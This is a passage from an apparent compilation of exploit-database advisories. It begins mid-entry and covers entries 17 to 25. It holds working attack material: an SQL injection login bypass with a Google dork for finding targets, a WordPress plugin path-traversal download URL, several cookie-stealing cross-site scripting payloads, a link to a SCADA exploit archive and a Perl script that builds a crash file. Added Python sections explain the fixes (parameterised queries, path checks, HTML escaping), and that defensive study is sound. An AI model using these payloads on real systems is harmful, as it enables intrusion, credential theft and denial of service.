      hii</div><font color=red><body onload="prompt( String.fromCharCode(120,115,115,32,116,101,115,116));">//
      -----------------------------147872036312473
      Content-Disposition: form-data; name="icon"

      look/images/icons/i1.gif
      -----------------------------147872036312473
      Content-Disposition: form-data; name="insert"

      Save
      -----------------------------147872036312473--

      --==[[ Greetz To ]]==--
      ############################################################################################
      #Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
      #Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
      #Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
      #Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk
      #############################################################################################

      --==[[Love to]]==--
      # My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
      #Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik)

      --==[[ Special Fuck goes to ]]==--
      <3 suriya Cyber Tyson <3
  18. # Exploit Title: Free Article Submissions SQL Injection Vulnerability
# Google Dork: inurl:/category.php?id=22 "Affiliate Programs Portal" inurl:/category.php?id=2 "Arts & Entertainment"
# Date: 07/12/2014
# Exploit Author: BarrabravaZ
# Vendor Homepage: http://www.articlesetup.com/
# Software Link: [download link if available]
# Version: 1.00
# Tested on: Windows

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
«««:»»» Author will not be responsible for any damage. «««:»»»
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
x
x Issue:
x SQL Injection Bypass Login
x
x Risk level: High
x ~ The remote attacker has the possibility to manage the website.
x ~ The remote attacker is able to log in to the website with access level admin.
x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
##
## Proof Of Concept:
## http://127.0.0.1/admin/login.php
##
## Username : ' OR 1=1 #
## Password : barrabravaz
##
##
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Special thanks to:
[+] Chae Cryptn
[+] Slackerc0de Family
[+] SBH Pentester
[+] Pocong XXX
[+] Madleets
[+] Xplorecrew
[+] Hackernewbie
[+] Yogyacarderlink
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
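The username `' OR 1=1 #` in entry 18 works because the login code splices the form field straight into its SQL string: the leading quote ends the string literal, `OR 1=1` makes the WHERE clause true for every row, and the comment token discards the password comparison. The script below is an added example, not code from the advisory or from Free Article Submissions (a PHP application). It reproduces the defect against a constructed in-memory SQLite table with hypothetical `username`/`password` columns and shows the parameterised query that closes it. SQLite's line comment is `--`, so the script uses that where the advisory's MySQL payload uses `#`.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the application's admin table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO users (username, password) VALUES ('admin', 'correct-horse')"
    )
    conn.commit()
    return conn


def build_vulnerable_query(username, password):
    """The defect class: form fields interpolated into the SQL text.

    A quote inside `username` is indistinguishable from the quotes the
    programmer wrote, so the user rewrites the WHERE clause.
    """
    return (
        "SELECT id, username FROM users WHERE username='%s' AND password='%s'"
        % (username, password)
    )


def vulnerable_login(conn, username, password):
    """Returns the matched username, or None. Unsafe: see build_vulnerable_query."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[1] if row else None


def safe_login(conn, username, password):
    """Same lookup with bound parameters: the driver sends the values
    separately from the SQL text, so a quote in `username` stays data."""
    row = conn.execute(
        "SELECT id, username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[1] if row else None


# SQLite equivalent of the advisory's "' OR 1=1 #" (MySQL comments with "#").
BYPASS_USERNAME = "' OR 1=1 -- "


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query(BYPASS_USERNAME, "barrabravaz"))
    print("vulnerable login returns:", vulnerable_login(db, BYPASS_USERNAME, "barrabravaz"))
    print("parameterised login returns:", safe_login(db, BYPASS_USERNAME, "barrabravaz"))
```

The printed query makes the bypass visible: everything after `--` is a comment, so the password condition never reaches the database. Parameter binding is the fix; stored password hashing is a separate control and is left out here to keep the comparison between the two queries clear.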
  19. ######################
# Exploit Title : Wordpress Ajax Store Locator <= 1.2 Arbitrary File Download
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
# Software Link : Premium
# Dork Google: inurl:ajax-store-locator
# index of ajax-store-locator
# Date : 2014-12-06
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
######################

# PoC Exploit:

http://TARGET/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=[../../somefile]

"download_file" variable is not sanitized.

#####################

Discovered By : Claudio Viviani

http://www.homelab.it

info@homelab.it
homelabit@protonmail.ch

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################
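Entry 19 says the `download_file` parameter is passed through unsanitised, so a `../../` prefix walks out of the plugin directory. The function below is an added example, not code from the advisory or from the plugin (which is PHP), of how a download handler should resolve a requested name: it canonicalises both the base directory and the candidate with `realpath` and compares the results with `commonpath`, which rejects traversal, absolute paths, symlinks pointing outside, and sibling directories that a plain string-prefix check (`startswith(base)`) would wrongly accept. The directory layout is constructed in a temporary folder for the demonstration.

```python
import os
import tempfile


def safe_download_path(base_dir, requested):
    """Return the real path of `requested` inside `base_dir`, or None.

    Rejects empty names, NUL bytes, "../" traversal, absolute paths,
    symlinks that resolve outside base_dir, and names that only share a
    string prefix with base_dir (e.g. base_dir + "_private").
    """
    if not requested or "\x00" in requested:
        return None
    base = os.path.realpath(base_dir)
    # os.path.join discards `base` when `requested` is absolute; realpath
    # then resolves any ".." and symlinks so the comparison is on real paths.
    candidate = os.path.realpath(os.path.join(base, requested))
    try:
        if os.path.commonpath([base, candidate]) != base:
            return None
    except ValueError:
        # Different drives on Windows: no common prefix, hence outside.
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def make_demo_dir():
    """Constructed layout (assumption, not the plugin's real tree):

        <tmp>/downloads/catalog.csv         the only legitimate file
        <tmp>/downloads_private/secret.txt  sibling dir a prefix check accepts
        <tmp>/outside.txt                   target of "../outside.txt"
    """
    root = tempfile.mkdtemp()
    base = os.path.join(root, "downloads")
    os.makedirs(base)
    with open(os.path.join(base, "catalog.csv"), "w") as fh:
        fh.write("sku,price\n")
    os.makedirs(os.path.join(root, "downloads_private"))
    with open(os.path.join(root, "downloads_private", "secret.txt"), "w") as fh:
        fh.write("x\n")
    with open(os.path.join(root, "outside.txt"), "w") as fh:
        fh.write("y\n")
    return root, base


if __name__ == "__main__":
    _, base = make_demo_dir()
    for name in ["catalog.csv", "../outside.txt",
                 "../downloads_private/secret.txt", "../../somefile",
                 "/etc/passwd", ""]:
        print("%-34r -> %s" % (name, safe_download_path(base, name)))
```

Only `catalog.csv` resolves; every other name returns None and the handler should answer 404 rather than echo the rejected path. Logging the rejected `requested` value is a cheap detection signal for this class of probing.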
  20. source: https://www.securityfocus.com/bid/47008/info

Advantech/BroadWin SCADA WebAccess is prone to multiple remote vulnerabilities including an information-disclosure issue and a remote code-execution issue.

An attacker can exploit these issues to execute arbitrary code and gain access to sensitive information. Other attacks may also be possible.

Advantech/BroadWin SCADA WebAccess 7.0 is vulnerable; other versions may also be affected.

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35495.zip
  21. source: https://www.securityfocus.com/bid/47014/info

MC Content Manager is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

MC Content Manager 10.1.1 is vulnerable; other versions may also be affected.

<form name="hack" action="http://www.example.com/?module=users" method="post">
<input type="hidden" name="module" value="users">
<input type="hidden" name="action" value="remind">
<input type="hidden" name="user_email" value='"><script>alert(document.cookie)</script>'>
</form>

<form name="hack" action="http://www.example.com/?module=users" method="post">
<input type="hidden" name="module" value="users">
<input type="hidden" name="action" value="register">
<input type="hidden" name="user_email" value='"><script>alert(document.cookie)</script>'>
</form>

<form name="hack" action="http://www.example.com/?module=users" method="post">
<input type="hidden" name="module" value="users">
<input type="hidden" name="action" value="register">
<input type="hidden" name="user_hide" value='"><script>alert(document.cookie)</script>'>
</form>
  22. source: https://www.securityfocus.com/bid/47015/info

GrapeCity Data Dynamics Reports is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Data Dynamics Reports 1.6.2084.14 is vulnerable; other versions may also be affected.

http://www.example.com/CoreHandler.ashx?dd:script=CoreViewerInit.js&reportName=<script>alert('XSS1!')</script>&uniqueId=<script>alert('XSS2!')</script>#

http://www.example.com/CoreHandler.ashx?dd:script=CoreController.js&uniqueId=<script>alert('XSS1!')</script>&traceLevel=<script>alert('XSS2!')</script>#
  23. source: https://www.securityfocus.com/bid/47017/info

Ripe Website Manager is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Ripe Website Manager 1.1 is vulnerable; other versions may also be affected.
  24. source: https://www.securityfocus.com/bid/47027/info

netjukebox is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

netjukebox 5.25 is vulnerable; other versions may also be affected.

http://www.example.com/netjukebox/message.php?skin=%22%3E%3Cscript%3Ealert(0)%3C%2fscript%3E
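Entries 17 and 21 to 24 are one defect seen five times: a user-supplied string (private-message body, `user_email`, `reportName`, `skin`) is written into the page without HTML encoding, so a `">` or `</div>` inside it ends the context the template author intended and whatever follows is parsed as markup. The script below is an added example in Python, not code from any of those advisories or products, showing output encoding per context with the payload strings from the entries as constructed, inert sample input. The page template and field names are hypothetical.

```python
import html

# Payload strings from the advisories above (PBBoard entry 17, shortened;
# MC Content Manager entry 21; netjukebox entry 24) plus a benign string.
# They are plain data here: nothing in this script evaluates them.
SAMPLE_INPUTS = {
    "pbboard_text": 'hii</div><font color=red><body onload="prompt(1)">//',
    "mc_user_email": '"><script>alert(document.cookie)</script>',
    "netjukebox_skin": '"><script>alert(0)</script>',
    "benign": "hello, world & friends",
}


def render_text(value):
    """Encode a user-controlled string for an HTML text node.

    html.escape(quote=True) maps & < > " ' to entities, so the browser
    displays the characters instead of parsing them as tags.
    """
    return html.escape(value, quote=True)


def render_attribute(name, value):
    """Encode a user-controlled string for a double-quoted attribute value.

    The '"' -> &quot; mapping is what stops the '">' prefix used by the
    reflected payloads from closing the attribute early.
    """
    return '%s="%s"' % (name, html.escape(value, quote=True))


def encoded_is_inert(encoded):
    """True if no character that can open a tag or end an attribute survives."""
    return not any(ch in encoded for ch in "<>\"'")


def message_page(title, body):
    """Hypothetical private-message view: every user field is encoded for
    the context it lands in (text node for title and body, attribute for
    the data-title echo)."""
    return (
        "<h1>" + render_text(title) + "</h1>\n"
        "<div " + render_attribute("data-title", title) + ">"
        + render_text(body) + "</div>"
    )


if __name__ == "__main__":
    for label, raw in SAMPLE_INPUTS.items():
        print("%-16s -> %s" % (label, render_text(raw)))
    print(message_page("hi", SAMPLE_INPUTS["pbboard_text"]))
```

The point is where the encoding happens: at output, for the exact context (text node, attribute, URL, script). Stripping tags on input is not a substitute, because the stored value is later emitted into contexts the input filter never saw. A Content-Security-Policy that disallows inline script limits the impact if an encoding call is missed, but does not replace it.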
  25. source: https://www.securityfocus.com/bid/47040/info

eXPert PDF is prone to a denial-of-service vulnerability.

Attackers can exploit this issue to cause the application to crash, denying service to legitimate users.

eXPert PDF 7.0.880.0 is vulnerable; other versions may also be affected.

#!/usr/bin/perl
###
# Title : eXPert PDF Batch Creator v7 Denial of Service Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Blocked 'vsbatch2pdf.exe' When Generate
# Tested on : Windows XP SP3 Français
# Target : eXPert PDF Editor v7.0.880.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# Usage : Upload The HTML file in eXPert PDF Batch Creator (vsbatch2pdf.exe) And Start The Generate

use strict;
use warnings;

#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";
print " |=============================================|\n";
print " |= [!] Name : eXPert PDF Batch Creator v7 =|\n";
print " |= [!] Exploit : Denial of Service Exploit =|\n";
print " |= [!] Author : KedAns-Dz =|\n";
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
print " |=============================================|\n";
sleep(2);
print "\n";

# Oversized "URL": "http://" followed by 17425 'A' bytes (x binds tighter than .)
my $junk = "http://" . ("\x41" x 17425);

# The failure check belongs on open(), not on the later print
open(my $fh, ">", "Kedans.html") or die "\n [-] OpsS! File is Not Created !!\n";
print $fh $junk;
close($fh);
print "\n [+] File successfully created!\n";

#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================